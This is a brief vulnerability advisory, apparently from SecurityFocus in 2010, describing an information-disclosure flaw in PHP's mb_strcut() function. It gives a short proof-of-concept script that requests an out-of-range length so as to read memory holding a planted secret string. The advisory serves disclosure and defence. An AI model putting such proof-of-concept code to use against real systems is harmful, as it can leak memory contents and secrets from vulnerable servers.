PHP 'mb_strcut()' Function Information Disclosure Vulnerability

The following proof-of-concept code is available:

<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>


 

Privacy Statement
Copyright 2010, SecurityFocus